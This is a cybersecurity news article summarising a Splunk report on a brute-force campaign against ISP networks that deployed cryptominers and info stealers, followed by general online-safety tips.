Mass Exploitation Campaign Hits 4,000+ ISP Networks to Deploy Info Stealers and Crypto Miners

A devastating cyberattack has struck thousands of Internet Service Providers (ISPs) in China and the U.S. West Coast, leaving a trail of compromised systems and cryptocurrency mining operations in its wake. The Splunk Threat Research Team has uncovered a massive exploitation campaign from Eastern Europe that targets these ISPs to deploy info stealers and crypto miners on their networks.

The attack began with weak credential brute force attacks, allowing threat actors to gain unauthorized access to the targeted systems. Once inside, they deployed cryptocurrency miners and crimeware tools with capabilities such as data exfiltration, persistence, self-termination, and pivot attacks. The malware also disabled remote access, further entrenching itself within the compromised systems.

"The Splunk Threat Research Team observed actors performing minimal intrusive operations to avoid detection," notes the report published by Splunk. "However, they created artifacts from already compromised accounts to maintain persistence." The attackers used tools that rely on scripting languages such as Python and Powershell to execute their malicious operations under restricted environments.

The IP CIDR ranges observed in the attack suggest a specific targeting of ISP infrastructure, likely for cryptomining operations (XMR). Before executing their payload, the attackers disabled security features and terminated services that detect cryptominers. The folder containing the malware also included text files listing over 4,000 target IPs and passwords, focusing on ISPs in China and the U.S. West Coast.

Upon decoding the PowerShell scripts used by the attackers, experts discovered that they were attempting to prepare the compromised system for further payload execution. This preparation involved disabling security product features and terminating or stopping services associated with cryptominer detection.

The malware was capable of taking screenshots of the compromised host and capturing cryptocurrency wallet addresses from the clipboard. It then sent this data to its Command and Control (C2) server, which operated via a Telegram bot. The actions observed by the attackers during the entrenchment and subsequent operations within the targeted hosts appeared to rely on scripting languages, reducing their footprint and avoiding detection.

"These actions could be described as 'just enough' to successfully operate on victims and obtain as much processing power as possible," concludes the report. This level of sophistication highlights the evolving nature of cyber threats and the need for robust security measures to protect against such attacks.

Key Takeaways:

• The attack targeted ISPs in China and the U.S. West Coast, deploying info stealers and crypto miners on compromised systems.
• The attackers used weak credential brute force attacks to gain access to the targeted systems.
• The malware disabled remote access and entrenches itself within the compromised systems.
• The attack relied on scripting languages such as Python and Powershell to execute malicious operations.
• The folder containing the malware included text files listing over 4,000 target IPs and passwords.

Stay Safe Online:

To protect yourself from similar attacks, it is essential to maintain robust security measures. This includes:

* Using strong, unique passwords for all accounts. * Enabling two-factor authentication whenever possible. * Keeping your operating system and software up-to-date with the latest security patches. * Being cautious when clicking on links or downloading attachments from unknown sources.

Stay informed about the latest cybersecurity threats by following reputable sources and taking proactive steps to protect your online presence.